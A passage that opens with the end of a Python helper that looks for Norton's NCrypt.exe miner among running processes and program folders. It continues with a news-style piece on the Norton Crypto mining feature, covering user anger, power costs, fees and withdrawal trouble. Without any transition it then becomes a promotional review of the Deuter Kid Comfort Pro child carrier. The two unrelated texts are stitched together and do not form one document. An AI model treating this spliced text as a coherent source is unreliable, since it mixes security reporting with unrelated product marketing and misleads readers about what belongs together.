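if __name__ == "__main__":
    # Live use on Windows: check running processes, then the usual program directories.
    procs = running_miner_processes(live_tasklist())
    roots = [p for p in (os.environ.get("ProgramFiles"), os.environ.get("ProgramFiles(x86)")) if p]
    print("running:", procs or "none")
    print("on disk:", miner_files(roots) or "none")
```

A file hit only tells you the component is installed; a running NCrypt.exe process is the stronger indicator that mining was switched on. Off Windows, `live_tasklist()` returns an empty string and nothing is flagged, which is why the two functions take their input as data rather than calling the system directly.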

From reading user posts on the Norton Crypto community forum, it seems some longtime Norton customers were horrified at the prospect of their antivirus product installing coin-mining software, regardless of whether the mining service was turned off by default.

“How on Earth could anyone at Norton think that adding crypto mining within a security product would be a good thing?,” reads a Dec. 28 thread titled “Absolutely furious.”

“Norton should be DETECTING and killing off crypto mining hijacking, not installing their own,” the post reads. “The product people need firing. What’s the next ‘bright idea’? Norton Botnet? And I was just about to re-install Norton 360 too, but this has literally caused me to no longer trust Norton and their direction.”

It’s an open question whether Norton Crypto users can expect to see much profit from participating in this scheme, at least in the short run. Mining a proof-of-work cryptocurrency such as Ethereum (which still used proof-of-work at the time) means putting your computer’s spare GPU capacity to work on a race to solve hashing puzzles for block rewards; validating other users’ transactions is a by-product of that work, not its economic point. Keeping the GPU under sustained load causes one’s computer to draw more power, which can increase one’s overall electricity costs.

“Norton is pretty much amplifying energy consumption worldwide, costing their customers more in electricity use than the customer makes on the mining, yet allowing Norton to make a ton of profit,” tweeted security researcher Chris Vickery. “It’s disgusting, gross, and brand-suicide.”

Then there’s the matter of getting paid. Norton Crypto lets users withdraw their earnings to an account at cryptocurrency platform CoinBase, but as Norton Crypto’s FAQ rightly points out, there are coin mining fees as well as transaction costs to transfer Ethereum.

“The coin mining fee is currently 15% of the crypto allocated to the miner,” the FAQ explains. “Transfers of cryptocurrencies may result in transaction fees (also known as “gas” fees) paid to the users of the cryptocurrency blockchain network who process the transaction. In addition, if you choose to exchange crypto for another currency, you may be required to pay fees to an exchange facilitating the transaction. Transaction fees fluctuate due to cryptocurrency market conditions and other factors. These fees are not set by Norton.”

Which might explain why so many Norton Crypto users have taken to the community’s online forum to complain they were having trouble withdrawing their earnings. Those gas fees are the same regardless of the amount of crypto being moved, so the system simply blocks withdrawals if the amount requested can’t cover the transfer fees.

I guess what bothers me most about Norton Crypto is that it will be introducing millions of perhaps less savvy Internet users to the world of cryptocurrency, which comes with its own set of unique security and privacy challenges that require users to “level up” their personal security practices in fairly significant ways.

Several of my elder family members and closest friends are longtime Norton users who renew their subscription year after year (despite my reminding them that it’s way cheaper just to purchase it again each year as a new user). None of them are particularly interested in or experts at securing their computers and digital lives, and the thought of them opening CoinBase accounts and navigating that space is terrifying.

Big Yellow is not the only brand that’s cashing in on investor fervor over cryptocurrencies and hoping to appeal to a broader (or maybe just older) audience: The venerable electronics retailer RadioShack, which relaunched in 2020 as an online-focused brand, now says it plans to chart a future as a cryptocurrency exchange.

“RadioShack’s argument is basically that as a very old brand, it’s primed to sell old CEOs on cryptocurrency,” writes Adi Robertson for The Verge.

“Too many [cryptocurrency companies] focused on speculation and not enough on making the ‘old-school’ customer feel comfortable,” the company’s website states, claiming that the average “decision-making” corporate CEO is 68 years old. “The older generation simply doesn’t trust the new-fangled ideas of the Bitcoin youth.”

Deuter Kid Comfort Pro – Child Carrier You Can Trust

When you’re out for a hike with your kids, the most important thing about choosing the right child carrier is to make sure it’s going to be comfortable not only for yourself but also for your child. I was more than happy to test a child carrier from the reputable German company Deuter, which has been designing and building top-quality backpacks and child carriers since 1938.

The popularity of Deuter products does not come by accident. Their backpacks and carriers are stylish, comfortable, practical, and durable. The customers love the great mix of reliable materials, functional design, and good looks. Deuter uses quality products and modern designs to meet all of your child’s comfort needs.

This product has a high rating of 4.8 stars with over 200 reviews on Amazon. There is no doubt that this child carrier is one of the best available on the market at the moment, but is it worth every cent you pay? It certainly comes packed with features, so let’s look at them now.

Deuter Kid Comfort Pro Features

  • Aircomfort back system
  • The large VariFlex ECL hip fins are energy-efficient and can be adjusted for maximum comfort.
  • The VariSlide back-length system offers a wide range of adjustment, so you can set the child carrier to fit either parent comfortably.
  • The Pull-Forward system construction makes it simple to adjust the hip belt even when you’re carrying a lot of weight.
  • The height-adjustable child’s seat has a variable cushion width to promote a healthy sitting posture.
  • Integrated safety harness – keeps kids safe and sound while you’re biking
  • 3 outer pockets for snacks, toys, and more
  • The durable aluminum frame with a sturdy kickstand is tip-resistant, which is very useful when loading the child.
  • Permanently integrated sunroof and a rear-view mirror. The carrier comes with a detachable backpack that may be used separately.

Deuter Kid Comfort Pro child carrier is suitable for children from 8 months old up to 45 pounds or 4 years of age. It has a ventilated back system that allows air to circulate, which is excellent news for your child’s comfort as not many offer this feature. It also comes with lumbar support and elastic on the hip belt, making it exceptionally comfortable for you, especially when carrying your child for more extended periods.

This child carrier comes with a sunshade, and we all know how precious this can be when you take your kid out, and the elements (or other people) get in their eyes. The sun can also heat up quite quickly, and it will make them hot and fussy, so if you plan on taking your child out for a long time, make sure you take something along to protect them.

It’s also really lightweight (8 lbs 5 oz), even considering all its features! It can be easily stored into the boot of your car or just about anywhere else when you aren’t using it while still having access to everything you need while out and about with your child.

It also comes with a rain cover to protect your child when the weather is not in your favor. This rain cover is operated by just one zip, which you will find on the front of the carrier. You can see how much easier this makes it for when you need it. Don’t get caught in the elements when you have your child with you, no matter where you are!

If you plan on going on a hike or anything else of the sort with your child, this carrier is comfortable enough for it. The shoulder straps come with adjustable load lifters to get the right comfort level no matter what you are doing.

Pros of the Deuter Kid Comfort Pro

  1. The Deuter’s padded back system ensures your child is both comfortable and safe during a hike, as it distributes their weight equally on your shoulders and your back. This helps to reduce pressure points that can cause pain and put you off from doing the activities you love.
  2. The unique child harness protects your child as it’s designed to keep them securely in their seat, right throughout even the roughest trails or any unexpected accidents that might happen along the way! This is especially valuable if your little one has fallen asleep on the track, as the harness will help to keep them seated in comfort against your back.
  3. The additional safety features of the Deuter Kid Comfort Pro will put your mind at ease as it comes with a fully adjustable footrest and the 5-point harness that is padded and reinforced for extra sturdiness and durability. The footwell can be adjusted depending on your child’s size and allows them to participate in the hike instead of just getting carried along.
  4. This child carrier is perfect for both short and tall parents as it has several height adjustments so that even if you are very short or very tall, this unit will work well with you!
  5. The AirComfort back system allows you to customize the unit to fit you as it uses a mesh system that promotes airflow and ensures your child’s back is well ventilated as they sit against your spine.
  6. It is pretty roomy, which means your trip with this carrier won’t be cramped at all! You will easily go on hikes of up to several days and still ensure your child’s comfort.
  7. This is a lightweight carrier, which means you will have no trouble carrying it along with the rest of your gear without feeling too weighed down! It weighs just over 8 pounds, so you won’t feel the added weight even if you are trekking for hours on end.
  8. The Deuter Kid Comfort Pro is made of high-quality materials that are tear-resistant and provide just the right amount of flexibility as you take your child on a hike along a trail.
  9. This Deuter product is entirely free of per- and polyfluorinated chemicals (PFCs). As a result, it lowers the amount of environmentally harmful chemicals that pollute the environment and endanger human health. PFCs are used for various applications, including rain protection, since they have dirt- and grease-repellent characteristics. Instead, Deuter employs a DWR (Durable Water Repellency) impregnation, which is non-toxic to people and the environment.

Cons of the Deuter Kid Comfort Pro

  1. Some parents have mentioned that the seat is not entirely flat, which could be uncomfortable for your little one. This is, of course, entirely up to the child’s preference, but it is worth keeping that in mind.
  2. Some parents have complained that the sunshade is flimsy and not quite big enough, so you might want to opt for another child carrier if you are hiking in extreme heat conditions.
  3. This carrier is definitely on the pricier end of the scale. Still, if you want a durable and genuinely reliable hiking carrier, then this is something we highly recommend you invest in! It will not only give your child a comfortable ride, but it will also last for years and years if taken care of properly.

Conclusion – is Deuter Kid Comfort Pro worth it?

Yes, we do highly recommend the Deuter Kid Comfort Pro! This is one of the top-rated children’s carriers on Amazon, and while it is pricier than most, it certainly delivers. It offers unparalleled comfort for your child along with extreme durability, making it perfect for long treks in any terrain or climate condition. While the sunshade is a little on the light side, that can be remedied by using an umbrella with this unit, and it has multiple adjustable harnesses and footwells to accommodate you and your child’s unique needs.

The high-quality product design ensures maximum safety for your child as well as a truly comfortable ride with a very sturdy back system and a well-padded seat that is made with mesh for airflow, keeping your child cool throughout the entire hiking adventure. Overall, this unit is excellent for hikers of any level who want to ensure their child’s safety and comfort while enjoying nature from a new perspective.

The reviews for this product on Amazon.com are very encouraging, with many shoppers seeing value in the Deuter Kid Comfort Pro for their families.

The post Deuter Kid Comfort Pro – Child Carrier You Can Trust appeared first on Comfy Bummy.